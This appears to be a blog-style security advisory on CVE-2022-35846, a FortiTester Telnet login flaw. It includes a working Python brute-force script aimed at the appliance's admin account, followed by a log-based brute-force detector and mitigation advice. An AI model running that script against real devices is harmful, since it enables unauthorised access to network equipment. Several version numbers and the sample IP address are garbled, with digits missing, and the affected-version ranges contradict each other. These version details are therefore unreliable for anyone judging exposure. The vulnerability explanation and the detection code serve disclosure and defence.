---
Summary:
CVE-2022-35846 is a serious vulnerability in Fortinet's FortiTester appliance. It affects the Telnet interface on multiple versions (2.3. up to 4.2., and 7.. up to 7.1.) and lets a remote attacker brute-force admin credentials because the appliance does not properly limit how many times someone can try to log in.
---
What is CVE-2022-35846?
This vulnerability falls under CWE-307: Improper Restriction of Excessive Authentication Attempts. In plain English, the FortiTester device does NOT lock accounts or block connections after repeated failed login attempts over Telnet. A remote attacker can therefore keep guessing passwords indefinitely, which makes a brute-force attack practical rather than theoretical.
In short:
Any attacker with network access to the Telnet port can basically try every possible password without being locked out.
---
Who is Affected?
You are affected if you are running any of the versions below and have the Telnet service enabled and exposed:
FortiTester 7.. through 7.1.
Note:
These versions include many widely deployed FortiTester appliances.
Refer to the official advisory for a full list.
---
Why is this bad?
Once the correct password is guessed, the attacker gets admin access. An attacker with admin access can control your FortiTester appliance, potentially altering test results, forwarding attacks, or using the device to pivot into the rest of your network.
---
Example Brute-Force Script
Below is a very basic proof-of-concept Python script that uses telnetlib to attempt logins to a FortiTester device over Telnet. It is a demonstration and should only be run against equipment you own for testing.
```python
import telnetlib  # deprecated; removed from the standard library in Python 3.13

HOST = "192..2.10"  # Replace with your FortiTester IP
USER = "admin"
PWD_LIST = ["password1", "admin123", "test123", "letmein", "fortinet"]  # Sample passwords

for password in PWD_LIST:
    try:
        # Each guess opens a fresh Telnet session; the vulnerable device never throttles or locks
        tn = telnetlib.Telnet(HOST, 23, timeout=5)
        tn.read_until(b"login: ")
        tn.write(USER.encode("ascii") + b"\n")
        tn.read_until(b"Password: ")
        tn.write(password.encode("ascii") + b"\n")
        output = tn.read_until(b"@", timeout=3)  # FortiTester prompt includes "@"
        if b"@" in output:
            print(f"[SUCCESS] Password found: {password}")
            tn.close()
            break
        else:
            print(f"[FAIL] Invalid password: {password}")
            tn.close()
    except Exception as e:
        print(f"[ERROR] {e}")
```
Note: A real attacker would use a much bigger password list and run this in parallel for more speed.
---
Mitigation
- Upgrade to FortiTester 7.2. and above; see Fortinet's advisory for the fixed versions.
- Monitor logs for failed login attempts.
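The monitoring point above is easy to act on with a small detector. The code below is an added example, not from the original post or from Fortinet: it parses constructed syslog-style Telnet login records (the real FortiTester log format is an assumption here, so `LINE_RE` must be adapted to it), flags any source address that exceeds a failure threshold inside a sliding window, and notes whether a successful login followed the burst, which is the signature of a brute-force that worked.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample records in a generic syslog-like shape.
# Assumption: FortiTester's own log format differs; adjust LINE_RE accordingly.
SAMPLE_LOG = """\
2022-10-18T14:00:01Z telnetd: login failed user=admin src=10.0.0.5
2022-10-18T14:00:02Z telnetd: login failed user=admin src=10.0.0.5
2022-10-18T14:00:03Z telnetd: login failed user=admin src=10.0.0.5
2022-10-18T14:00:04Z telnetd: login failed user=admin src=10.0.0.5
2022-10-18T14:00:05Z telnetd: login failed user=admin src=10.0.0.5
2022-10-18T14:00:06Z telnetd: login succeeded user=admin src=10.0.0.5
2022-10-18T14:03:00Z telnetd: login failed user=admin src=10.0.0.9
2022-10-18T14:09:00Z telnetd: login failed user=admin src=10.0.0.9
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) telnetd: login (?P<result>failed|succeeded) "
    r"user=(?P<user>\S+) src=(?P<src>\S+)$"
)

def parse(log_text):
    """Turn raw lines into (timestamp, result, user, src) tuples; skip unparseable lines."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ")
            events.append((ts, m["result"], m["user"], m["src"]))
    return events

def detect_bruteforce(events, threshold=5, window=timedelta(minutes=1)):
    """Return {src: alert} for sources with >= threshold failures inside `window`.
    Since the device itself never locks out, the log is the only place the burst is visible."""
    alerts = {}
    recent = defaultdict(list)  # src -> failure timestamps inside the current window
    for ts, result, user, src in sorted(events):
        if result == "failed":
            q = recent[src]
            q.append(ts)
            while q and ts - q[0] > window:   # slide the window forward
                q.pop(0)
            if len(q) >= threshold and src not in alerts:
                alerts[src] = {"user": user, "first_seen": q[0],
                               "failures": len(q), "followed_by_success": False}
        elif src in alerts:                   # a success right after a burst: likely compromised
            alerts[src]["followed_by_success"] = True
    return alerts
```

Feed it the device's real log export and treat `followed_by_success` as an incident, not just an alert.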
---
References
- Fortinet Security Advisory - FG-IR-22-233
- NVD - CVE-2022-35846
- CWE-307: Improper Restriction of Excessive Authentication Attempts
In short:
If you’re running an affected FortiTester version and have Telnet enabled, update immediately, disable Telnet, and make sure only trusted networks can connect to your administrative ports. This simple flaw can quickly become a big risk if left unchecked.
Timeline
Published on: 10/18/2022 14:15:00 UTC
Last modified on: 10/20/2022 19:03:00 UTC